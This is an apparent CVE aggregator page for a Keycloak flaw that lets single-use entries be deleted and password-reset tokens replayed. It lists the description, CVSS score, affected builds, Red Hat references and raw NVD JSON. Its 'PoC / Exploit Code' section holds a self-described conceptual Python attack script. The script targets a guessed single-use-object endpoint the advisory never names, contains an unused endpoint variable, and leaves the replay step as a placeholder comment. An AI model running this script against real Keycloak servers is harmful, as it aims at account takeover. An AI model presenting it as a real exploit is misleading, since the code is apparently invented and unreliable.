CVE-2026-4325

Description

A flaw was found in Keycloak. The SingleUseObjectProvider, a global key-value store, lacks proper type and namespace isolation. This vulnerability allows an attacker to delete arbitrary single-use entries, which can enable the replay of consumed action tokens, such as password reset links. This could lead to unauthorized access or account compromise.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:redhat:build_of_keycloak:-:*:*:*:text-only:*:*:* - VULNERABLE

cpe:2.3:a:redhat:build_of_keycloak:26.2:*:*:*:text-only:*:*:* - VULNERABLE

cpe:2.3:a:redhat:build_of_keycloak:26.2.15:*:*:*:text-only:*:*:* - VULNERABLE

cpe:2.3:a:redhat:build_of_keycloak:26.4:*:*:*:text-only:*:*:* - VULNERABLE

cpe:2.3:a:redhat:build_of_keycloak:26.4.11:*:*:*:text-only:*:*:* - VULNERABLE

Keycloak (具体受影响版本请参考Red Hat官方公告 RHSA-2026:6475, RHSA-2026:6476 等)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Conceptual PoC for CVE-2026-4325
# Demonstrates the deletion of a SingleUseObject entry to allow token replay.

target_host = "http://target-keycloak"
# The specific endpoint for SingleUseObjectProvider manipulation may vary by version.
# This assumes an endpoint where the ID can be targeted due to lack of namespace isolation.
vulnerable_endpoint = f"{target_host}/auth/realms/master/protocol/openid-connect/logout" 

# Example ID of a single-use token (e.g. password reset token) that has already been consumed
token_id = "5f8a2b1c-..." 

headers = {
    "User-Agent": "PoC-Scanner/1.0",
    "Accept": "application/json"
}

try:
    print(f"[*] Attempting to delete consumed token entry: {token_id}")
    
    # In a real exploit, the attacker crafts a request that triggers the deletion
    # of the entry in the SingleUseObjectProvider key-value store.
    # This request structure is illustrative based on the vulnerability description.
    
    response = requests.delete(f"{target_host}/realms/master/single-use-objects/{token_id}", headers=headers)
    
    if response.status_code == 204:
        print("[+] Entry deleted successfully. Token replay may now be possible.")
        print("[+] Attempting to replay the token...")
        # Replay logic would go here (e.g., using the token to reset password)
    else:
        print(f"[-] Deletion failed. Status: {response.status_code}")

except Exception as e:
    print(f"Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4325
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4325
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4325/
[4] VulDB https://vuldb.com/cve/CVE-2026-4325
[5] https://access.redhat.com/errata/RHSA-2026:6475
[6] https://access.redhat.com/errata/RHSA-2026:6476
[7] https://access.redhat.com/errata/RHSA-2026:6477
[8] https://access.redhat.com/errata/RHSA-2026:6478
[9] https://access.redhat.com/security/cve/CVE-2026-4325
[10] https://bugzilla.redhat.com/show_bug.cgi?id=2448351

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4325", "sourceIdentifier": "[email protected]", "published": "2026-04-02T13:16:26.863", "lastModified": "2026-04-16T20:51:22.663", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Keycloak. The SingleUseObjectProvider, a global key-value store, lacks proper type and namespace isolation. This vulnerability allows an attacker to delete arbitrary single-use entries, which can enable the replay of consumed action tokens, such as password reset links. This could lead to unauthorized access or account compromise."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-653"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_keycloak:-:*:*:*:text-only:*:*:*", "matchCriteriaId": "1830E455-7E11-4264-862D-05971A42D4A6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_keycloak:26.2:*:*:*:text-only:*:*:*", "matchCriteriaId": "C339EBE3-6BFD-4082-B904-4E8DB87AAE68"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_keycloak:26.2.15:*:*:*:text-only:*:*:*", "matchCriteriaId": "3BDF8A92-727E-401B-80BB-A141DCB39750"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_keycloak:26.4:*:*:*:text-only:*:*:*", "matchCriteriaId": "100AA077-7467-4F62-A8FD-88BC336972DF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:build_of_keycloak:26.4.11:*:*:*:text-only:*:*:*", "matchCriteriaId": "17E79930-BE1C-4901-AF63-36B3EB149AFC"}]}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:6475", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://access.redhat.com/errata/RHSA-2026:6476", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://access.redhat.com/errata/RHSA-2026:6477", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://access.redhat.com/errata/RHSA-2026:6478", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://access.redhat.com/security/cve/CVE-2026-4325", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448351", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}